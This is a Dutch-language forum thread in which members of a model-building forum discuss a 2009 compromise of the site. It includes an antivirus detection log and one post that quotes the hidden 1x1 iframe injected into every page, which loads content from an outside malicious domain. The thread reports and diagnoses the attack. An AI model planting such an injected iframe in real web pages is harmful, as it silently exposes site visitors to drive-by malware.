Scan type: Realtime Protection Scan Event: Virus Found! Virus name: Bloodhound.Exploit.193 File: C:\Documents and Settings\roelof\Local Settings\Temporary Internet Files\Content.IE5\P6J61PEU\pieceArray[1].swf Location: C:\Documents and Settings\roelof\Local Settings\Temporary Internet Files\Content.IE5\P6J61PEU Computer: ROELOF-XP User: roelof Action taken: Clean failed : Quarantine failed : Access denied Date found: zaterdag 26 december 2009 13:51:06
Op elke pagina wordt direct na de BODY-tag een IFRAME geplaatst van 1x1 pixel die verwijst naar centiyo.com. En dat centiyo zuigt enorm. Ondanks verzoeken de domeinnaam te laten blokkeren weigert de provider dat te doen (nu valt het niet mee om iets in China te laten blokkeren :evil. Code: <iframe width=1 height=1 border=0 frameborder=0 src="http://centiyo.com/in.cgi?default"></iframe>
Tja, IE meld hem nu zelfs als unsafe....... Blijkbaar zit er ergens een grote lek in de forum software. Jammer.....
Goed werk Robert en ook de avatars weer terug Veel succes met de verdere werkzaamheden (hopelijk beleef je nog een beetje plezier aan je vakantie)
Hier GEEN problemen gehad ! Ik heb Firefox, AVG, MCafee en hier is NIETS binnen gekomen alleen enkele keren dat ik offline was dat ik nickname + wachtwoord moest in vullen Normaal als ik offline ben en ik kom op modelbouwforum dan kom ik automatisch online... Wat ook wel ff raar was, was dat de scherm afbeeldingen er niet meer waren of lag dit aan mijn PC ? Vanaf vanmorgen zie ik plots weer iedereen zijn scherm afbeelding... Behalve bij de mod.'s die hun scherm afbeelding is blijven staan bv. bij Emil en Robert... Groetjes